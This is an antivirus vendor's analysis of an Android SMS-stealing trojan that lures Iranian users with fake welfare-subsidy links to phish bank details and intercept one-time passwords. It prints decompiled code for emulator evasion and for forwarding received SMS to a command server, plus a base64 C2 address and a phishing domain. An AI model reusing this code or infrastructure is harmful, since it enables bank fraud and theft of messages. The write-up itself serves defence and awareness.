Type: Trojan

Destruction Level: Moderate

What is a Trojan?

Trojans are malware types that introduce themselves as healthy and legal software and act similarly to practical and applicable software but cause many destructions to the system when executing. The downloaded software from the internet, placing HTML text, attaching it to an email, etc. are ways that Trojans use to enter the system. Contrary to viruses and computer worms, Trojans are not reproducible

What is SmsSpy?Sinab malware family?

A group of infected applications intended to perform phishing attacks and access critical users’ data, is existing on valid Android markets such as Cafe Bazaar, and Myket and also can be found on invalid sites and markets such as Telegram channels or SMSs containing infected links which is used by users. Despite being apparently useful and illicit these types of malware actually not only have nothing positive to propose but siphoning personal users’ data to use in phishing attacks.

In the beginning, these malware types propose different options such as more services ( including accessing Court Notice, receiving subsidies, Edalat stocks, etc.) and by demanding pin money, they will direct the users to a fake page and siphon their bank information. as soon as the user inserting his/her account information, all his/her information will be siphoned to the attacker side and it can receive the user’s second password through accessing to user’s SMS and the attacker can steal the user’s account.

Technical Explanation

the name of this application is “Yaraney-e-man” which sends this text: ” [social welfare organization] Following the new issued circular, register through this link https[:]//refahhie[.]click to receive your welfare subsidies” to the users and when the user’s clicking on the URL, the malware will be downloaded. The application will receive its necessary permissions such as accessing to sending/reading SMS and accessing to User’s Contact list, then will show the following dialogues to the users.

Then the malware displays a webview to the user to siphon the mentioned information. After that, it displays a page to receive the user’s banking information to register the user. After the user enters his/her information, the user receives a failed error. The malware sends this information to its C&C server ( if the user entered his/her information and because the malware accesses the SMS and his/her dynamic password, the attacker steals his/her account.


 pollmikham.sinab.main main activity

the name of this application is “Yaraney-e-man” and it performs the following actions as soon as installation:

if the user uses Android 6.0 (API 23 level) or higher, it will receive the following permissions:

  • “android.permission.READ_SMS”- reading the user’s SMS
  • “android.permission.SEND_SMS”- sending SMS
  • “android.permission.RECEIVE_SMS”- receiving SMS
  • “android.permission.READ_CONTACTS”- reading the user’s contact information

if the user denied these permissions then the application will be closed.

Then, the malware fetches two layouts.bal and link.txt files from the assets route.

  • link.txt

this file contains /https[:]// link (this link is off and unaccessible now)

All the application activities are Web View types. the malware loads “/https[:]//” (it has no access to the Internet) to display the main activity.

  • layout.bal

This file contains the layout information and is about the existing widget deployments inside the activity

this activity places the existing link inside the link.txt file inside the Asset folder inside the _link variable and then calculates the _url value from the following value interpolation:

  • _androidid-: user’s phone ID
  • https[:]// :_link
  • Constant string: “=user?”
  • _url=_link + “?user=” + _androidid_
  • And then it creates the value of the variable _x from the addition of the following:
    Encoded address (base64): “aHR0cHM6Ly9maW5kbWUtbWFyc2hkZXYuY2YvcmF0cy9zaW51cy91cmwucGhw”
  • Constant string:  “?x=”
  • rando_: Random number generated in the specified range
  • x=”aHR0cHM6Ly9maW5kbWUtbWFyc2hkZXYuY2YvcmF0cy9zaW51cy91cmwucGhw”+ “?x=” + _rando_

Using the download2_ method, the malware receives the address of the variable content x_, which is a file containing a phishing URL, using the get method, and then displays the phishing URL (/https[:]// in the file in the main program activity to receive the user’s bank information.

Firebase messaging service

This service is a communication bridge between the malware and the user’s phone, which receives the notifications sent through Google Firebase with the resume method and executes the commands:

  • If _m2=null and _m=List: Using the poststring_ method, the malware will send the collected information (phone model, phone ID, network operator, battery level, and the On or OFF status of the phone screen) to the C2 server address.
  • if m=checkPermission_ and (phone id) m2=_androidid: Checks if the malware has received the “android.permission.RECEIVE_SMS” and “android.permission.SEND_SMS” permissions from the user’s phone.
  • If m=getLastSms_ and m2=_androidid: The information of the last received SMS (including online phone ID, phone model, SMS text, phone number, and network operator name) in the user’s phone is sent to the malware’s C2 server.
  • If m=getAllSMS_ and_m2=_androidid: all existing text messages on the user’s phone (the user’s phone ID along with the SMS text, sending or receiving number, time of receiving or sending the SMS) will be sent to the malware’s C2 server in the form of a string (if it does not exceed the specified size).
  • If m=getcontacts_ and m2=_androidid: all the contacts of the user’s phone (the user’s phone ID along with the number and name of the contacts) will be sent to the malware’s C2 server in the form of a string (if it does not exceed the specified size).
  • If _m = contacts & _androidid: send a message to all the contacts on the user’s phone using the sendlargesms_ method. In this way, using the method called “sendMultipartTextMessage” (a method to send a multipart text, which also uses the “divine message” method to divide the text into several parts, none of which is larger than the allowed size, because the volume of the text may be so large that it fails to send it) it tries to send the message (SMS) set to each of the user’s contacts (the content sent to the contact list is the same answer that the malware receives from its infected C2 server) and then if the operation is completed then it sends the report of the completion of the sending message along with the phone ID to the C2 malware server.
  • If m=sendmessage&_androidid: Using the PNSMS class and the send() method, the attacker can send a long SMS (SEND_SMS) and receive the SMS delivery report (SMS_DELIVERED). Also, it can check SMS status reports for when it is not possible to send SMS, such as:

When the phone is in a “No service” state, “Null PDU” when the text of the message is long, and “Radio off” when it is not possible to send SMS.
The attacker can also send an SMS to a (specific) phone number. When the “targetaddress” command is sent from the malware server, the attacker can send an SMS to the specified number and receive a report of whether it was sent correctly or not.
As a result, the PNSMS-library performance set includes the following:
Send long SMS and receive sending report
Send short or long SMS
Receiving an un-send error text (such as the phone being in flight mode, not having an antenna, not having enough charge, etc.)
Receive the delivery report or not
You can get all the results separately for each message stage (for long SMS) or together.
Sending an SMS to a specific number and receiving a report on whether or not it was sent

  • If m=hideAll _ and m2=null_: using the hideAppIcon method and also calling setComponentEnabledSetting hides its application icon in the user’s phone and keeps its application service in the background. Also, the application icon hiding message is sent to the malware server along with the phone ID, network operator name, model name, and battery level of the user’s phone.
  • If m=unhide _ and m2=_androidid_: If the malware icon is not hidden in the specified phone ID, the malware icon status report is sent to the malware server along with the phone ID, and network operator name, model name, and battery level of the user’s phone. If the malware icon is hidden, use the setComponentEnabledSetting method to reveal the malware icon and then send the operation report to the malware server along with the phone ID, network operator name, model name, and battery level of the user’s phone.

whatido_ method

In this method, if the phone model is equal to one of the values (“Nexus”, “nexus”, “Pixel”, “pixel”), (“nexus” and “pixel” are among the names that are usually used in the naming of Android emulators) will be exited from the program, which is the anti-emulator function of this malware.


<source lang="c">

public static boolean _whatido() throws Exception {

String str = _model;

if (str.indexOf("Nexus") > -1 || str.indexOf("nexus") > -1 || str.indexOf("Pixel") > -1 || str.indexOf("pixel") > -1) {


return false;


return true;



pollmikham.sinab.smsreceived Service 
service_start_ method:
According to the “android.provider.Telephony.SMS_RECEIVE” action, this service receives the following information as soon as the SMS is received:
1. The content of the message is accessed by using the parsesmsintentmulti (arg6, “body”) method and calling getMessageBody.
2. Using the method parsesmsintentmulti (arg6, “address”)_ and calling getOriginatingAddress will access the number of the sender of the message (SMS).
Then it sends the received SMS information along with the ID, model, and network operator of the user’s phone to the malware server

public static String _service_start(IntentWrapper arg6) throws Exception {

String v0_1;

int v0 = 0;

if(!smsreceived._whatido()) {


Common.StopService(smsreceived.processBA, "");

v0_1 = "";


else {

if((arg6.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) && (smsreceived._whatido())) {

_message[] v1 = new _message[0];

int v2 = v1.length;

while(v0 < v2) {

v1[v0] = new _message();



v0_1 = smsreceived._parsesmsintentmulti(arg6, "body");

String v1_1 = smsreceived._parsesmsintentmulti(arg6, "address");

httpjob v2_1 = new httpjob();

v2_1._initialize(smsreceived.processBA, "Job2", smsreceived.getObject());

v2_1._poststring(firebasemessaging._url, "messagetext=" + v0_1 + "&number=" + v1_1 + "&androidid=" + firebasemessaging._androidid + "&model=" + firebasemessaging._model + "&sim=" + firebasemessaging._networkname);


Common.StartService(smsreceived.processBA, firebasemessaging.getObject());


v0_1 = "";


return v0_1;


How to deal with and disinfect the system

To ensure that the device is not infected, install and keep the Padvish Antivirus database file updated and scan the system.

Ways to prevent phone infection

  • Avoid downloading and installing apps from unreliable mobile sources and markets.
  • When installing mobile apps, pay attention to the permissions requested.
  • Back up files and data stored on your phone.
  • Do not use unofficial versions of applications. Apps like Telegram and Instagram have many unofficial versions and most of them are broadcast through Telegram channels

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>